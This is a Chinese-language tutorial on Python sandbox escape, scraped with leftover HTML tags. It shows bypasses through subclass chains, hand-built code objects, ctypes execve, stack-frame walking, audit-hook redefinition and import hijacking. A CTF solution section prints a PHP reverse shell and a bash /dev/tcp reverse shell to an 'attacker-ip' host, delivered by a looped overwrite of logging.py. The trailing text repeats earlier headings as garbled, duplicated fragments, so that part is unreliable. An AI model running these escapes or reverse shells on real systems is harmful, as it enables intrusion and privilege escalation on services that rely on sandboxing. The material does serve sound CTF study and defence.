Python沙箱逃逸高级技巧<\/h1>

1. 全局变量与内置函数<\/h2>

Python中的globals()<\/code>包含了所有全局变量，包括内置函数__builtins__<\/code>：<\/p>

dir(globals()['__builtins__'<\/span>])  # 列出所有内置函数<\/span>
<\/span><\/span><\/code><\/pre>防御措施<\/h3>
禁用高危内置函数：<\/p>
eval(expression, {"__builtins__"<\/span>: {}}, context)  # 清空内置函数<\/span>
<\/span><\/span><\/code><\/pre>绕过方法<\/h3>
通过类继承链获取__builtins__<\/code>：<\/p>
[x.<\/span>__init__.<\/span>__globals__ for<\/span> x in<\/span> ''<\/span>.<\/span>__class__.<\/span>__base__.<\/span>__subclasses__() 
<\/span><\/span> if<\/span> x.<\/span>__name__==<\/span>"_wrap_close"<\/span>][0<\/span>]["system"<\/span>]('ls'<\/span>)
<\/span><\/span><\/code><\/pre>2. MRO方法解析顺序<\/h2>
利用类的__mro__<\/code>属性查看继承顺序，配合__subclasses__()<\/code>获取子类：<\/p>
''<\/span>.<\/span>__class__.<\/span>__mro__[1<\/span>].<\/span>__subclasses__()
<\/span><\/span><\/code><\/pre>3. AST沙箱绕过<\/h2>
防御措施示例<\/h3>
class<\/span> SafeEvaluator<\/span>(ast.<\/span>NodeVisitor):
<\/span><\/span>    # 限制允许的节点类型和操作符<\/span>
<\/span><\/span>    allowed_nodes =<\/span> (ast.<\/span>Expression, ast.<\/span>Call, ast.<\/span>Name, ...<\/span>)
<\/span><\/span>    allowed_operators =<\/span> (ast.<\/span>Add, ast.<\/span>Sub, ast.<\/span>Mult, ...<\/span>)
<\/span><\/span>    
<\/span><\/span>    def<\/span> visit_Attribute<\/span>(self, node):
<\/span><\/span>        raise<\/span> ValueError<\/span>("禁止属性访问"<\/span>)
<\/span><\/span><\/code><\/pre>绕过思路<\/h3>

通过字节码直接构造函数<\/li>
利用闭包或生成器获取上层作用域<\/li>
<\/ul>
4. 字节码与CodeObject<\/h2>
Python中万物皆对象，包括字节码(codeobject)。<\/p>
手动构造函数<\/h3>
Python 3.11+示例：<\/p>
import<\/span> types
<\/span><\/span>
<\/span><\/span>co_code =<\/span> b<\/span>'<\/span>\x97\x00<\/span>t<\/span>\x01\x00\x00<\/span>...'<\/span>  # 字节码<\/span>
<\/span><\/span>co_consts =<\/span> (None<\/span>, 'os'<\/span>)
<\/span><\/span>co_names =<\/span> ('__import__'<\/span>, 'popen'<\/span>, 'read'<\/span>)
<\/span><\/span>
<\/span><\/span>code_obj =<\/span> types.<\/span>CodeType(
<\/span><\/span>    co_argcount, co_posonlyargcount, ...<\/span>,
<\/span><\/span>    co_code, co_consts, co_names, ...<\/span>)
<\/span><\/span>
<\/span><\/span>my_exec =<\/span> types.<\/span>FunctionType(code_obj, globals())
<\/span><\/span>my_exec('ls'<\/span>)
<\/span><\/span><\/code><\/pre>5. 系统调用底层实现<\/h2>
绕过Python直接调用系统函数：<\/p>
import<\/span> ctypes
<\/span><\/span>
<\/span><\/span>libc =<\/span> ctypes.<\/span>CDLL(None<\/span>)
<\/span><\/span>FORK =<\/span> libc.<\/span>fork
<\/span><\/span>EXECVE =<\/span> libc.<\/span>execve
<\/span><\/span>
<\/span><\/span>def<\/span> my_system<\/span>(command):
<\/span><\/span>    args =<\/span> command.<\/span>split()
<\/span><\/span>    argv =<\/span> (ctypes.<\/span>c_char_p *<\/span> (len(args) +<\/span> 1<\/span>))()
<\/span><\/span>    for<\/span> i, arg in<\/span> enumerate(args):
<\/span><\/span>        argv[i] =<\/span> arg.<\/span>encode('utf-8'<\/span>)
<\/span><\/span>    argv[len(args)] =<\/span> None<\/span>
<\/span><\/span>    
<\/span><\/span>    pid =<\/span> FORK()
<\/span><\/span>    if<\/span> pid ==<\/span> 0<\/span>:
<\/span><\/span>        EXECVE(args[0<\/span>].<\/span>encode('utf-8'<\/span>), argv, None<\/span>)
<\/span><\/span>        libc.<\/span>_exit(1<\/span>)
<\/span><\/span>    else<\/span>:
<\/span><\/span>        libc.<\/span>waitpid(pid, None<\/span>, 0<\/span>)
<\/span><\/span>
<\/span><\/span>my_system("\/bin\/ls"<\/span>)
<\/span><\/span><\/code><\/pre>6. 栈帧利用<\/h2>
Python是基于栈帧的语言，可通过多种方式获取当前栈帧：<\/p>
通过异常获取<\/h3>
def<\/span> get_stack_frame_via_exception<\/span>():
<\/span><\/span>    try<\/span>:
<\/span><\/span>        raise<\/span> Exception<\/span>
<\/span><\/span>    except<\/span> Exception<\/span> as<\/span> e:
<\/span><\/span>        return<\/span> e.<\/span>__traceback__.<\/span>tb_frame
<\/span><\/span><\/code><\/pre>通过闭包获取<\/h3>
def<\/span> get_stack_frame_via_closure<\/span>():
<\/span><\/span>    frame =<\/span> None<\/span>
<\/span><\/span>    def<\/span> inner<\/span>():
<\/span><\/span>        nonlocal<\/span> frame
<\/span><\/span>        frame =<\/span> (lambda<\/span>: None<\/span>).<\/span>__code__.<\/span>co_frame
<\/span><\/span>    inner()
<\/span><\/span>    return<\/span> frame
<\/span><\/span><\/code><\/pre>通过生成器获取<\/h3>
def<\/span> waff<\/span>():
<\/span><\/span>    def<\/span> f<\/span>():
<\/span><\/span>        yield<\/span> g.<\/span>gi_frame.<\/span>f_back
<\/span><\/span>    g =<\/span> f()  
<\/span><\/span>    frame =<\/span> next(g)
<\/span><\/span>    return<\/span> frame.<\/span>f_back.<\/span>f_back.<\/span>f_globals['key'<\/span>]
<\/span><\/span><\/code><\/pre>利用方式<\/h3>
回溯栈帧获取__builtins__<\/code>：<\/p>
def<\/span> waff<\/span>():
<\/span><\/span>    def<\/span> f<\/span>():
<\/span><\/span>        yield<\/span> g.<\/span>gi_frame.<\/span>f_back
<\/span><\/span>    g =<\/span> f()
<\/span><\/span>    frame =<\/span> [i for<\/span> i in<\/span> g][0<\/span>]
<\/span><\/span>    return<\/span> frame.<\/span>f_back.<\/span>f_back.<\/span>f_back.<\/span>f_globals['__builtins__'<\/span>]
<\/span><\/span><\/code><\/pre>7. 审计钩子绕过<\/h2>
Python 3.8+的sys.audit<\/code>机制会监控敏感操作。<\/p>
绕过示例<\/h3>
重新定义关键函数：<\/p>
[len:=<\/span>lambda<\/span> x:1<\/span>, os:=<\/span>__import__("os"<\/span>), os.<\/span>system(cmd)]
<\/span><\/span><\/code><\/pre>8. import机制利用<\/h2>
Python的import顺序：<\/p>

当前目录<\/li>
系统内置路径<\/li>
<\/ol>
利用方法<\/h3>
上传恶意模块到当前目录，如logging.py<\/code>，利用条件竞争实现提权。<\/p>
9. 实战案例<\/h2>
巅峰极客CTF题解<\/h3>

通过PHP反弹nobody权限shell<\/li>
<\/ol>
<?<\/span>php<\/span> system<\/span>('php -r \'$sock=fsockopen("attacker-ip",1337);exec("sh <&3 >&3 2>&3");\''<\/span>);?><\/span>
<\/span><\/span><\/span><\/code><\/pre>
创建恶意logging.py<\/code>并循环复制<\/li>
<\/ol>
echo "__import__('os').popen('bash -i >& \/dev\/tcp\/attacker-ip\/1338 0>&1')"<\/span> > \/tmp\/logging.py
<\/span><\/span>echo "while true; do cp \/tmp\/logging.py \/sandbox\/target\/logging.py; done"<\/span> > \/tmp\/exp.sh
<\/span><\/span>sh \/tmp\/exp.sh
<\/span><\/span><\/code><\/pre>
触发import执行恶意代码<\/li>
<\/ol>
防御建议<\/h2>

使用严格的AST检查<\/li>
限制字节码操作<\/li>
监控栈帧操作<\/li>
控制import路径<\/li>
实施最小权限原则<\/li>
使用容器隔离环境<\/li>
<\/ol>
这些技术展示了Python沙箱逃逸的多种高级方法，理解这些原理对于构建更安全的Python环境至关重要。<\/p>

Python沙箱逃逸高级技巧<\/h1>

3. AST沙箱绕过<\/h2>

4. 字节码与CodeObject<\/h2>
Python中万物皆对象，包括字节码(codeobject)。<\/p>

6. 栈帧利用<\/h2>
Python是基于栈帧的语言，可通过多种方式获取当前栈帧：<\/p>

7. 审计钩子绕过<\/h2>
Python 3.8+的`sys.audit<\/code>机制会监控敏感操作。<\/p>`

利用方法<\/h3>
上传恶意模块到当前目录，如`logging.py<\/code>，利用条件竞争实现提权。<\/p>`

Python沙箱逃逸高级技巧<\/h1>

3. AST沙箱绕过<\/h2>

4. 字节码与CodeObject<\/h2> Python中万物皆对象，包括字节码(codeobject)。<\/p>

6. 栈帧利用<\/h2> Python是基于栈帧的语言，可通过多种方式获取当前栈帧：<\/p>

7. 审计钩子绕过<\/h2> Python 3.8+的sys.audit<\/code>机制会监控敏感操作。<\/p>

利用方法<\/h3> 上传恶意模块到当前目录，如logging.py<\/code>，利用条件竞争实现提权。<\/p>

4. 字节码与CodeObject<\/h2>
Python中万物皆对象，包括字节码(codeobject)。<\/p>

6. 栈帧利用<\/h2>
Python是基于栈帧的语言，可通过多种方式获取当前栈帧：<\/p>

7. 审计钩子绕过<\/h2>
Python 3.8+的`sys.audit<\/code>机制会监控敏感操作。<\/p>`

利用方法<\/h3>
上传恶意模块到当前目录，如`logging.py<\/code>，利用条件竞争实现提权。<\/p>`